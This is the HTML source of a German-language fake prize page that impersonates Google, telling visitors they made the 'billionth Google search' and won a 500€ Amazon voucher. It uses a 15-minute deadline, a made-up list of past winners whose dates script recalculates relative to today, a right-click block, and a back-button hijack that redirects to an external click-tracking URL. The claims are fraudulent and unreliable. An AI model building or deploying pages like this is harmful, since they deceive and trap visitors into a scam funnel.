<html>

<head>




    <base href="">

    <title>(1) Message</title>
    <meta charset="utf-8">
    <link rel="stylesheet" type="text/css" href="style.css">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link type="image/x-icon" rel="shortcut icon" href="/gift/amazon/de-search/googleg_lodp.ico">
</head>

<body>
    <div id="black_overlay" style="
"></div>
    <div id="prize_confirmation">
        <p id="prize_confirmation_headline">Ihr Gewinn:</p>
        <img id="prize_confirmation_prize_image" src="amazon_card.jpg" alt="Apple iPhone 7">
        <p id="prize_confirmation_prize_name">500€ Amazon Gutschein</p>
        <p>Sie gewinnen einen 500€ Amazon Gutschein! Ob Elektronik, Kleidung oder Haushaltswaren, der weltweit größte
            Online-Einkaufsmarkt Amazon hat fast alles, was man sich wünschen kann auf Lager. Mit diesem exklusiven
            Gutschein können Sie sofort nach Herzenslust losshoppen.</p>
        <p>Überraschen Sie Ihre Lieblinge mit einem großen Naschvorrat, lassen Sie das Herz Ihres Partners mit einem
            tollen Geschenk höher schlagen oder gönnen Sie sich eine lang verdiente Belohnung. Tragen Sie den
            Gutscheincode einfach in Ihrem Amazon Benutzerbereich ein und 500€ werden Ihnen innerhalb von wenigen
            Sekunden gutgeschrieben. Jetzt steht Ihrem kostenlosen Großeinkauf nichts mehr im Wege.</p>
        <div class="prize_button confirm">Preis annehmen</div>
        <div class="prize_button abort">Seite schließen</div>
    </div>
    <div id="header"><img src="logo.png" alt="Google" id="logo">
        <div id="header_inner_right">
            <img src="header_squares.png" id="header_squares">
            <div id="header_login_button">Anmelden</div>
        </div>

    </div>
    <div id="header2">
        <p>Benachrichtigungen</p>
    </div>
    <div id="wrapper">
        <div id="content">
            <p id="headline">Sie haben die milliardste Google Suche getätigt</p>
            <div id="copy">
                <p>Vor wenigen Minuten haben unsere Computer Sie als unseren neuen Gewinner der milliardsten Google
                    Suche ausgewertet!</p>
                <p>Unser letzter Gewinner war Heike Brandstättner aus Leverkusen, die am 14.02.2020 mit Ihrer
                    milliardsten Google Suche einen Samsung KU6179 Ultra HD Fernseher gewonnen hat.</p>
                <p>Wir sind stolz Ihnen mitteilen zu dürfen, dass Sie unser nächster Gewinner sind.</p>
                <p>Jedes Mal, wenn die milliardste Google Suche erreicht wird, setzen wir periodisch den Zähler zurück
                    und proklamieren einen neuen Gewinner.</p>
                <p>Sie dürfen sich einen von drei unten stehenden verdeckten Preisen aussuchen. Zusätzlich werden Sie in
                    die Google Hall of Fame eingetragen und erhalten eine zertifizierte Siegerurkunde.</p>
                <p>Hinter jedem blauen Pokal steckt ein toller Preis. Sie dürfen davon einen aufdecken und für sich
                    behalten.</p>
                <p>Aus Sicherheitsgründen dürfen wir Ihre Einladung leider nicht länger als 15 Minuten offen halten.
                    Wählen Sie bitte jetzt einen Preis und folgen Sie anschließend den Anweisungen auf Ihrem Bildschirm.
                </p>
            </div>
            <div id="prizes">
                <div class="prize one">
                    <img src="trophy.jpg" alt="Preis" class="prize_image">
                    <div class="real_prize">
                        <img src="/google_play_card.jpg" class="real_prize_image">
                    </div>
                    <div class="prize_button">Auswählen</div>
                </div>
                <div class="prize two">
                    <img src="trophy.jpg" alt="Preis" class="prize_image">
                    <div class="real_prize">
                        <img src="/google_play_card.jpg" class="real_prize_image">
                    </div>
                    <div class="prize_button">Auswählen</div>
                </div>
                <div class="prize three">
                    <img src="trophy.jpg" alt="Preis" class="prize_image">
                    <div class="real_prize">
                        <img src="/google_play_card.jpg" class="real_prize_image">
                    </div>
                    <div class="prize_button">Auswählen</div>
                </div>
                <div class="clear"></div>
            </div>
        </div>
        <script>
            var winner_date1 = new Date();
            winner_date1.setDate(winner_date1.getDate() - 28);
            var winner_date2 = new Date();
            winner_date2.setDate(winner_date2.getDate() - 55);
            var winner_date3 = new Date();
            winner_date3.setDate(winner_date3.getDate() - 89);
            var winner_date4 = new Date();
            winner_date4.setDate(winner_date4.getDate() - 113);
            var winner_date5 = new Date();
            winner_date5.setDate(winner_date5.getDate() - 148);
            var winner_date6 = new Date();
            winner_date6.setDate(winner_date6.getDate() - 177);
            var winner_date7 = new Date();
            winner_date7.setDate(winner_date7.getDate() - 206);
            var winner_date8 = new Date();
            winner_date8.setDate(winner_date8.getDate() - 246);
            var winner_date9 = new Date();
            winner_date9.setDate(winner_date9.getDate() - 273);
            var winner_date10 = new Date();
            winner_date10.setDate(winner_date10.getDate() - 299);
            function formatDate(date) {
                var monthNames = [
                    "Januar", "Februar", "März",
                    "April", "Mai", "Juni", "Juli",
                    "August", "September", "Oktober",
                    "November", "Dezember"
                ];
                var day = date.getDate();
                var monthIndex = date.getMonth();
                var year = date.getFullYear();
                return day + '. ' + monthNames[monthIndex] + ' ' + year;
            }
        </script>
        <div id="hall_of_fame">
            <p id="hall_of_fame_headline">Die letzten Gewinner</p>
            <div class="hall_of_fame_winner">
                <img src="winner_1.jpg" class="hall_of_fame_winner_image">
                <div class="hall_of_fame_winner_info">
                    <div class="hall_of_fame_winner_info_name">Heike Brandstättner</div>
                    <div class="hall_of_fame_winner_info_date">
                        <script>document.write(formatDate(winner_date1));</script>17. Februar 2020</div><br>
                    <div class="hall_of_fame_winner_prize"><span>Preis: </span>50€ Google Play-Geschenkkarte</div>
                </div>
            </div>
            <div class="hall_of_fame_winner">
                <img src="winner_initial_m.jpg" class="hall_of_fame_winner_image">
                <div class="hall_of_fame_winner_info">
                    <div class="hall_of_fame_winner_info_name">Manuel Voigt</div>
                    <div class="hall_of_fame_winner_info_date">
                        <script>document.write(formatDate(winner_date2));</script>21. Januar 2020</div><br>
                    <div class="hall_of_fame_winner_prize"><span>Preis: </span>Apple Watch Series 1</div>
                </div>
            </div>
            <div class="hall_of_fame_winner">
                <img src="winner_3.jpg" class="hall_of_fame_winner_image">
                <div class="hall_of_fame_winner_info">
                    <div class="hall_of_fame_winner_info_name">Andre S</div>
                    <div class="hall_of_fame_winner_info_date">
                        <script>document.write(formatDate(winner_date3));</script>18. Dezember 2019</div><br>
                    <div class="hall_of_fame_winner_prize"><span>Preis: </span>50€ Google Play-Geschenkkarte</div>
                </div>
            </div>
            <div class="hall_of_fame_winner">
                <img src="winner_cat2.jpg" class="hall_of_fame_winner_image">
                <div class="hall_of_fame_winner_info">
                    <div class="hall_of_fame_winner_info_name">Therese Bläsen</div>
                    <div class="hall_of_fame_winner_info_date">
                        <script>document.write(formatDate(winner_date4));</script>24. November 2019</div><br>
                    <div class="hall_of_fame_winner_prize"><span>Preis: </span>50€ Google Play-Geschenkkarte</div>
                </div>
            </div>
            <div class="hall_of_fame_winner">
                <img src="winner_heart.jpg" class="hall_of_fame_winner_image">
                <div class="hall_of_fame_winner_info">
                    <div class="hall_of_fame_winner_info_name">Anime Sucht</div>
                    <div class="hall_of_fame_winner_info_date">
                        <script>document.write(formatDate(winner_date5));</script>20. Oktober 2019</div><br>
                    <div class="hall_of_fame_winner_prize"><span>Preis: </span>Apple Watch Series 1</div>
                </div>
            </div>
            <div class="hall_of_fame_winner">
                <img src="winner_2.jpg" class="hall_of_fame_winner_image">
                <div class="hall_of_fame_winner_info">
                    <div class="hall_of_fame_winner_info_name">Katja Schönefeld</div>
                    <div class="hall_of_fame_winner_info_date">
                        <script>document.write(formatDate(winner_date6));</script>21. September 2019</div><br>
                    <div class="hall_of_fame_winner_prize"><span>Preis: </span>500€ Amazon Gutschein</div>
                </div>
            </div>
            <div class="hall_of_fame_winner">
                <img src="winner_initial_s.jpg" class="hall_of_fame_winner_image">
                <div class="hall_of_fame_winner_info">
                    <div class="hall_of_fame_winner_info_name">Stefan Lochter</div>
                    <div class="hall_of_fame_winner_info_date">
                        <script>document.write(formatDate(winner_date7));</script>23. August 2019</div><br>
                    <div class="hall_of_fame_winner_prize"><span>Preis: </span>50€ Google Play-Geschenkkarte</div>
                </div>
            </div>
            <div class="hall_of_fame_winner">
                <img src="winner_cat.jpg" class="hall_of_fame_winner_image">
                <div class="hall_of_fame_winner_info">
                    <div class="hall_of_fame_winner_info_name">suri- ja</div>
                    <div class="hall_of_fame_winner_info_date">
                        <script>document.write(formatDate(winner_date8));</script>14. Juli 2019</div><br>
                    <div class="hall_of_fame_winner_prize"><span>Preis: </span>500€ Amazon Gutschein</div>
                </div>
            </div>
            <div class="hall_of_fame_winner">
                <img src="winner_4.jpg" class="hall_of_fame_winner_image">
                <div class="hall_of_fame_winner_info">
                    <div class="hall_of_fame_winner_info_name">Basti Friedel</div>
                    <div class="hall_of_fame_winner_info_date">
                        <script>document.write(formatDate(winner_date9));</script>17. Juni 2019</div><br>
                    <div class="hall_of_fame_winner_prize"><span>Preis: </span>Apple Watch Series 1</div>
                </div>
            </div>
            <div class="hall_of_fame_winner">
                <img src="winner_initial_r.jpg" class="hall_of_fame_winner_image">
                <div class="hall_of_fame_winner_info">
                    <div class="hall_of_fame_winner_info_name">Rene Weger</div>
                    <div class="hall_of_fame_winner_info_date">
                        <script>document.write(formatDate(winner_date10));</script>22. Mai 2019</div><br>
                    <div class="hall_of_fame_winner_prize"><span>Preis: </span>50€ Google Play-Geschenkkarte</div>
                </div>
            </div>
        </div>

    </div>
    <canvas id="canvas" width="1920" height="1002"></canvas>
    <style>
        canvas {
            display: block;
            position: relative;
            zindex: 1;
            pointer-events: none;
            position: fixed;
            top: 0;
        }
    </style>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
    <script src="confetti.js"></script>
    <script src="script.js"></script>



    <script>

        document.onmousedown = function (e) {
            if (e.button == 2) {
                alert("");
                return false;
            }
        }
    </script>


    <script>
        history.pushState(null, null, document.location);
        window.addEventListener('popstate', function () {
            window.location = "https://www.zcpqb.com/click.php?key=x7vvihi76i4p4xs4lrsv";
        });
    </script>



</body>

</html>